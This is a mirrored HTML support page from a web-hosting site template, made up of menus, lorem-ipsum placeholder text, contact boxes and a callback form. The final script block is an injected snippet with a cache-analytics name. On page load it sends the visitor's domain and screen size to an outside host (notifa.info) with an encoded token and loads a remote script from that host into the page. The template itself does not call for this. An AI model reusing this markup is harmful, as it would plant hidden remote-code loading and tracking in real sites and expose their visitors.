<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from rctheme.com/demo-html/prohost/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<!-- Mobile Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1">

<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<meta name="description" content="">
<meta name="author" content="">
<title>Our Support</title>

<!-- Favicon -->
<link rel="icon" href="images/favicon.png">

<!-- Bootstrap core CSS -->
<link href="css/bootstrap.css" rel="stylesheet" media="all" />

<!-- Font Awesome CSS -->
<link rel="stylesheet" href="css/font-awesome.css" media="all" />

<!-- Main Template CSS -->
<link rel="stylesheet" href="css/style.css" media="all" />

<!-- Animation CSS -->
<link rel="stylesheet" href="css/animate.min.css" media="all" />
</head>

<body>
<!-- ========= Header Section Start ========= -->

<header>
  <div class="top_header">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link">
            <ul>
              <li>24x7 Live support</li>
              <li>+ 91 123 4567 890</li>
            </ul>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="top_link right">
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="login.html">Login</a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="main_menu">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-3 col-xs-12">
          <div class="logo"><a href="index-2.html"><img src="images/logo.png" alt="logo" title="logo" /></a></div>
        </div>
        <div class="col-md-9 col-sm-9 col-xs-12">
          <div class="navbar navbar-default" role="navigation">
            <div class="navbar-header">
              <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"> <span class="sronly">Menu</span> <i class="fa fa-bars" aria-hidden="true"></i></button>
            </div>
            <nav class="navbar navbar-default">
              <div id="navbar-collapse-1" class="collapse navbar-collapse">
                <ul class="nav navbar-nav">
                  <li><a href="index-2.html">Home</a></li>
                  <li><a href="#">Domain <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="register-domain.html">Register a Domain</a></li>
                      <li><a href="transfer-domain.html">Transfer Your Domain</a></li>
                      <li><a href="domain-price.html">Domain Price</a></li>
                      <li><a href="domain-promos.html">Domain Promos</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Hosting <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="shared-hosting.html">Shared Hosting</a></li>
                      <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
                      <li><a href="dedicated-servers.html">Dedicated Servers</a></li>
                      <li><a href="vps.html">VPS Servers</a></li>
                      <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
                      <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Email <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="business-email.html">Business Email</a></li>
                      <li><a href="cloud-business-email.html">Cloud Business Email</a></li>
                      <li><a href="microsoft-office-365.html">Microsoft Office 365</a></li>
                      <li><a href="google-apps.html">Google Apps</a></li>
                    </ul>
                  </li>
                  <li><a href="#">Security <b class="caret"></b></a>
                    <ul class="wm-dropdown-menu">
                      <li><a href="ssl-security.html">SSL Security</a></li>
                      <li><a href="codeguard.html">Codeguard</a></li>
                    </ul>
                  </li>
                  <li><a href="bundled-offers.html">Bundle Offers</a></li>
                  <li class="active"><a href="support.html">Support</a></li>
                </ul>
              </div>
            </nav>
          </div>
        </div>
      </div>
    </div>
  </div>
</header>

<!-- ========= Header Section End ========= --> 

<!-- ========= Inner Page Banner Section Start ========= -->

<section class="inner_page_header">
  <div class="container">
    <div class="row">
      <div class="col-md-12">
        <div class="inner_headin_s"><i class="fa fa-th-list"></i>
          <h1>Our Support</h1>
          <p>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit. Suspendisse et justo Praesent mattis.Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit uspendisse et justo.</p>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Inner Page Banner Section End ========= --> 

<!-- ========= Support Feature Section Start ========= -->

<section class="support_features">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings black_text">
          <h6>Contact Us</h6>
          <h3>Our Solution</h3>
          <div class="sep black_bg"></div>
        </div>
      </div>
      <div class="col-md-4 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="support_features_inner">
          <h5 class="section_sub_heading">Adipiscing Lorem</h5>
          <ul>
            <li>consectetuer adipiscing elit uspendisse et justo.</li>
            <li>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit.</li>
            <li>sit et justo consectetuer adipiscing elit.</li>
            <li>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit.</li>
          </ul>
        </div>
      </div>
      <div class="col-md-4 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
        <div class="support_features_inner">
          <h5 class="section_sub_heading">Lorem Adipiscing</h5>
          <ul>
            <li>consectetuer adipiscing elit uspendisse et justo.</li>
            <li>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit.</li>
            <li>sit et justo consectetuer adipiscing elit.</li>
            <li>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit.</li>
          </ul>
        </div>
      </div>
      <div class="col-md-4 col-sm-12 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".5s">
        <div class="support_features_inner">
          <h5 class="section_sub_heading">Adipiscing Lorem</h5>
          <ul>
            <li>consectetuer adipiscing elit uspendisse et justo.</li>
            <li>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit.</li>
            <li>sit et justo consectetuer adipiscing elit.</li>
            <li>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit.</li>
          </ul>
        </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Support Feature Section End ========= --> 

<!-- ========= Contact Info Section Start ========= -->

<section class="contact_info text_center">
  <div class="container">
    <div class="row">
      <div class="col-md-12 col-sm-12 col-xs-12">
        <div class="headings white_text">
          <h6>Contact Us</h6>
          <h3>Get in Touch</h3>
          <div class="sep white_bg"></div>
        </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".1s">
        <div class="contact_box"> <i class="fa fa-phone"></i>
          <h5 class="section_sub_heading">Phone</h5>
          <p>Call, fax or mail IT experts for immediate resolution of any query or concern.<br>
            (8AM - 7PM IST Monday-Friday) </p>
          <p>Ph: (+000) 123 456 78900<br>
            Fax: (+111) 123 456<br>
            Email ID: info@yourdomain.com </p>
        </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".3s">
        <div class="contact_box"> <i aria-hidden="true" class="fa fa-comments"></i>
          <h5 class="section_sub_heading">Live Chat</h5>
          <p>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit. Suspendisse et justo Praesent mattis. Lorem ipsum.</p>
          <a class="primary_button" href="#">Live Chat</a> </div>
      </div>
      <div class="col-md-4 col-sm-4 col-xs-12 wow fadeInLeft" data-wow-duration=".3" data-wow-delay=".5s">
        <div class="contact_box"> <i aria-hidden="true" class="fa fa-support"></i>
          <h5 class="section_sub_heading">Sumbit Ticket</h5>
          <p>Lorem ipsum dolor sit amet sit et justo consectetuer adipiscing elit. Suspendisse et justo Praesent mattis. Lorem ipsum dolor.</p>
          <a class="primary_button" href="#">Support Ticket</a> </div>
      </div>
    </div>
  </div>
</section>

<!-- ========= Contact Info Section End ========= --> 

<!-- ========= Call Back Form Section Start ========= -->

<section class="call_back_main text_center">
  <div class="container">
    <div class="col-md-6 col-sm-6 col-xs-12">
      <div class="headings black_text">
        <h6>Contact Us</h6>
        <h3>Get a Call Back</h3>
        <div class="sep black_bg"></div>
      </div>
      <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the ndustry's standard dummy text ever since the 1500s, when an unknown printer took. </p>
    </div>
    <div class="col-md-6 col-sm-6 col-xs-12 wow fadeInRight" data-wow-duration=".3" data-wow-delay=".1s">
      <div class="form_outer">
        <form>
          <input type="text" name="name" class="name" placeholder="Name" required="">
          <input type="text" name="phone" class="name" placeholder="Contact Number" required="">
          <input type="email" name="email" class="name" placeholder="Email" required="">
          <input type="submit" name="submit" class="primary_button" value="Send Now">
        </form>
      </div>
    </div>
  </div>
</section>

<!-- ========= Call Back Form Section End ========= --> 

<!-- ========= Footer Section Start ========= -->

<footer class="footer">
  <div class="f_outr_section">
    <div class="container">
      <div class="row">
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>About Us</h4>
            <div class="f_about">
              <p>Lorem ipsum dolor sit amet dolor sit elit Suspendisse et justo et justo sit Praesent mattis commodo augue Aliquam ornare. Lorem ipsum dolor sit amet dolor sit elit. Lorem ipsum dolor sit amet dolor sit elit.</p>
            </div>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Quick Links</h4>
            <ul>
              <li><a href="about-us.html">About Us</a></li>
              <li><a href="contact-us.html">Contact Us</a></li>
              <li><a href="support.html">Support</a></li>
              <li><a href="offers.html">Offers</a></li>
              <li><a href="bundled-offers.html">Bundle Offers</a></li>
              <li><a href="login.html">Login</a></li>
              <li><a href="404.html">404 Page</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading">
            <h4>Our Services</h4>
            <ul>
              <li><a href="shared-hosting.html">Shared Hosting</a></li>
              <li><a href="vps.html">Virtual Private Server</a></li>
              <li><a href="reseller-hosting.html">Reseller Hosting</a></li>
              <li><a href="dedicated-servers.html">Dedicated Server</a></li>
              <li><a href="ssl-security.html">SSL Certificated</a></li>
              <li><a href="cloud-hosting.html">Cloud Hosting</a></li>
              <li><a href="wordpress-hosting.html">Wordpress Hosting</a></li>
            </ul>
          </div>
        </div>
        <div class="col-md-3 col-sm-6 col-xs-12">
          <div class="f_txt_heading ">
            <h4>Contact Us</h4>
            <div class="f_contact_s">
              <div class="f-con-head">Address:-
                <p>Lorem ipsum dolor<br>
                  amet dolor sit elit Suspendisse</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Contact:-
                <p>Ph: (+000) 1234 5678<br>
                  Fax: (+000) 1234 5678</p>
              </div>
            </div>
            <div class="f_contact_s">
              <div class="f-con-head">Email:-
                <p><a href="mailto:info@yourdomain.com">info@yourdomain.com</a><br>
                  <a href="mailto:sales@yourdomain.com">sales@yourdomain.com</a></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="footer-bottom">
    <div class="container">
      <div class="row">
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="news_letr">
            <form>
              <input type="text" placeholder="Enter your Email" class="nwesltr">
              <input type="submit" class="secondry_button join_now" value="Join Now">
            </form>
          </div>
        </div>
        <div class="col-md-6 col-sm-6 col-xs-12">
          <div class="social">
            <ul>
              <li><a href="#"><i class="fa fa-facebook"></i></a></li>
              <li><a href="#"><i class="fa fa-google"></i></a></li>
              <li><a href="#"><i class="fa fa-twitter"></i></a></li>
              <li><a href="#"><i class="fa fa-linkedin"></i></a></li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div class="copy-right">
    <div class="container">
      <div class="row">
        <div class="col-md-12 col-sm-12 col-xs-12">Copyright © 2015 - 2017 prohost. All Rights Reserved.</div>
      </div>
    </div>
  </div>
</footer>

<!-- ========= Footer Section End ========= --> 

<!-- Bootstrap core JavaScript --> 
<script type="text/javascript" src="js/jquery.min.js"></script> 
<script type="text/javascript" src="js/bootstrap.min.js"></script> 

<!-- Animation JavaScript --> 
<script type="text/javascript" src="js/jquery.wow.min.js" ></script> 
<script type="text/javascript" src="js/wow.min.js" ></script> 

<!-- Custom Template JavaScript --> 
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + 4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m834VngSV4X7u9YVqPF3s41UPGTOyncMZtyl24%2bt43gsci4dPYaloYFgog%2fkRqU1akpFjaHeGm8Abv0GGcc6s2Heex4ukPardUWf6bnDUckTKznz0C7dsMnKERG3Q7Q28k5CK3c4XFgmRNpdyy3TEvta6vvCux5xH73LgXS7Xw%2fIPXv9VTeg92EpM778EZiYKrITYiTL57bpBN5gt4SzF50pAOS4AUL4sIjcPieF4gypjI0%2f82WU0Fa4yYAdoGsXgdr8bsbni44KWkScfwqltiYwMNeKABXPgfloBtE7aBu6JExLlTpvN3CXpa8%2fX1IguBo5KCBaWEBCF5jrUPcNkb6Db4026kXZyoS4GE4MICXj4WKHAuW1Hs958qOKc6ttuielVd1%2fPMeSQz0IWWISth8zq8j3qXgsXT9qZzZrHYu1gZDFdfS3h0i3GaDyJlIShRNKXOnLPvGi3DVjSnIWzOaMUVfR3I17yUf00sGBL95DpQe3U69CM5w%3d%3d + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from rctheme.com/demo-html/prohost/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 17 Sep 2018 17:00:25 GMT -->
</html>